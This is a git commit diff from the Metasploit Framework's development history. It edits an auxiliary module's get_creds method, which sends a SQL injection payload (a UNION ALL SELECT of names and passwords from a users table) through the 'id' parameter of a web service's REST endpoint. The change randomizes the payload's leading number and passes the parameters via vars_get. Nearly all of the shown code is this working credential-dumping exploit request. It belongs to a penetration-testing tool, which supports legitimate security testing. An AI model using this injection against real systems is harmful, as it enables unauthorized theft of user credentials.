randomize number, use vars_get

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-09-18 15:03:32 -05:00
parent d83e108e74
commit e9faf305b2
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
1 changed files with 7 additions and 4 deletions

View File

@ -42,14 +42,17 @@ class MetasploitModule < Msf::Auxiliary
end end
def get_creds def get_creds
api_uri = "/webservice/rest/object-inquire?apikey=#{datastore['APIKEY']}&id=" api_uri = "/webservice/rest/object-inquire"
api_uri = normalize_uri(target_uri.path, api_uri) api_uri = normalize_uri(target_uri.path, api_uri)
cmd = '1) UNION ALL SELECT CONCAT(name," ",password) from users#' cmd = "#{rand(256)}) UNION ALL SELECT CONCAT(name,\" \",password) from users#"
cmd = Rex::Text.uri_encode(cmd, 'hex-all')
res = send_request_cgi( res = send_request_cgi(
'method' => 'GET', 'method' => 'GET',
'uri' => api_uri << cmd 'uri' => api_uri,
'vars_get' => {
'apikey' => datastore['APIKEY'],
'id' => cmd
}
) )
unless res unless res